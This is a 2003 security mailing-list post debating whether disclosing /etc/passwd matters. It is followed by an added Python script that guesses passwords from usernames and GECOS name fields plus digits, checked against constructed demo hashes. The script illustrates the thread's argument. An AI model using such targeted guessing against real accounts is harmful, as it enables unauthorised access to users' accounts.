WebApp Sec mailing list archives

Re: htaccess with apache


From: Tim Greer <chatmaster () charter net>
Date: 11 Nov 2003 14:34:44 -0800

On Fri, 2003-11-07 at 06:12, António Vasconcelos wrote:
> Tim Greer wrote:
>
>> the traditional buffer overflow in malloc() and
>> memcpy() or strcpy() shows just that.
>>
>> How is this relevant to the permissions on passwd?
>
> Just to show how easy it is to do something that looks to be innocent and
> turns out to be a major security problem.

Pretty easy, assuming the person in question doesn't know about the
subject.  However, and alternatively, the same question applies when
people make a big deal about something that isn't when they don't fully
understand the implications.

>> (unless your server isn't set up well), and save the resources since
>> your server is secured properly.  Oh well, to each their own, but I have
>> to wonder when people make a big deal about something that's not.
>
> I'm not talking about good/bad server setup.

If you're saying access to view the passwd file is a huge risk you are.

> It's just that the username/password authentication mechanism is a weak
> one, and I know that, if possible, users will use a bad or easy to guess
> password.

Then the problem exists anyway.  I said myself that it doesn't hurt, but
there's no way you can effectively run a web host with many users on it
and hide all this trivial information and still have a lot of services
(and security implementations) work well.  If the user has a weak
password, it's all over anyway for their account.  You can protect your
system, provided you know how, but you can not make people smarter and
trying to hide such trivial things is not going to do any good.  Those
are the people that shouldn't have shell access anyway, and being that,
the username in passwd will not need to be the same for their email or
FTP anyway, so what risk does the system's yellow page file pose?  Do
you see what I mean about "how you set up your system and how secure it
is"?

> My experience tells me that about 10% of the users _do_ choose a password
> that can be retrieved just from the username and GECOS fields, plus one
> or two digits.

Okay, so someone can likely know this from their CGI/PHP script, error
codes/banners/messages, domain name, etc. anyway.  And, what I said
above still applies.

> So, disclosing the /etc/passwd file is something that should not be
> done,

Yes it should.

> and should not be regarded as trivial.

But, it is.

> As it _may_ contain info valuable for someone that wants to break into
> your system.

Unlikely.  And only valuable to access the person's account--your system
has nothing to do with it if it's secure--either it is or not.  You plan
for users to have their accounts accessed due to weak passwords or poor
methods of storing them, and so on.  If their script is insecure to
allow any file to be viewed that the CGI/PHP process allows, then an
attacker can easily find out what their username is ANYWAY!  Why do you
actually believe this is such a big deal?

> You should not regard anything as trivial just because you don't know
> how (or if) it can be used against you.

I agree, and since I do know, I can confidently say this is trivial.
If you fail to understand the issues involved, that's not my fault.
Conversely, the same logic applies to the other side of this debate--you
shouldn't regard things as a major risk, just because you don't
understand or know that they aren't.  End of discussion, if you want me
to provide an example on an account or via a vulnerable script, with the
passwd having been accessed, I'll be happy to do it to prove my point to
you.  In the meantime, maybe buy some books or something and learn about
the topic you are so hotly debating.
-- 
Tim Greer <chatmaster () charter net>
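The attack António describes above (a password derived from the username and GECOS fields plus one or two digits) is exactly what a disclosed /etc/passwd feeds. The script below is an added example, not code from either poster: it parses passwd lines, builds the targeted guess list per account, and checks the guesses against a shadow-style hash table. The passwd lines, the shadow entries and the salted SHA-256 hash (a stand-in for crypt(3)) are all constructed for the demo.

```python
"""Targeted password guessing from /etc/passwd fields (username + GECOS).

Added example for the thread above; sample data is constructed, and a
salted SHA-256 stands in for the system's crypt(3) hash.
"""
import hashlib
import re

# Constructed sample /etc/passwd; only the 7-field lines are used.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jsmith:x:1001:1001:John Smith,Room 12,555-0100:/home/jsmith:/bin/bash
mgarcia:x:1002:1002:Maria Garcia:/home/mgarcia:/bin/bash
webdev:x:1003:1003:Web Developer:/home/webdev:/bin/sh
"""


def hash_password(salt, password):
    """Stand-in for crypt(3): salted SHA-256 hex digest (demo only)."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed shadow-style table: name -> (salt, hash).  The guesser
# below only ever sees the hashes, never the plaintexts used here.
SHADOW = {
    "root": ("a1", hash_password("a1", "r00t!Xq7")),
    "jsmith": ("b2", hash_password("b2", "smith42")),
    "mgarcia": ("c3", hash_password("c3", "Maria7")),
    "webdev": ("d4", hash_password("d4", "xK9#pLq2vWm")),
}

# One digit (0-9) or two digits (00-99), plus the bare base word.
DIGIT_SUFFIXES = [""] + [str(n) for n in range(10)] + [f"{n:02d}" for n in range(100)]


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; skips comments and malformed lines."""
    users = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gecos": gecos,
                      "home": home, "shell": shell})
    return users


def gecos_words(gecos):
    """Split the full-name subfield (first comma-separated GECOS field) into words."""
    full_name = gecos.split(",")[0]
    return [w for w in re.split(r"[\s.\-]+", full_name) if w]


def candidate_bases(user):
    """Base words an attacker derives from the username and GECOS name."""
    words = [user["name"]] + gecos_words(user["gecos"])
    bases = set()
    for w in words:
        bases.update({w, w.lower(), w.capitalize(), w.lower()[::-1]})
    names = gecos_words(user["gecos"])
    if len(names) >= 2:
        first, last = names[0].lower(), names[-1].lower()
        bases.update({first + last, first[0] + last, first + last[0]})
    return sorted(bases)


def candidates(user):
    """Yield each base word with every digit suffix, without duplicates."""
    seen = set()
    for base in candidate_bases(user):
        for suffix in DIGIT_SUFFIXES:
            guess = base + suffix
            if guess not in seen:
                seen.add(guess)
                yield guess


def crack(users, shadow):
    """Return {name: password} for accounts whose password comes from passwd fields."""
    found = {}
    for user in users:
        if user["name"] not in shadow:
            continue
        salt, digest = shadow[user["name"]]
        for guess in candidates(user):
            if hash_password(salt, guess) == digest:
                found[user["name"]] = guess
                break
    return found


if __name__ == "__main__":
    accounts = parse_passwd(PASSWD)
    for name, password in crack(accounts, SHADOW).items():
        print(f"{name}: {password}")
```

Each account costs only a few hundred to a couple of thousand guesses, which is why the GECOS field matters more than its "trivial" appearance suggests: the two weak accounts fall, and the two with unrelated passwords survive the same list.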

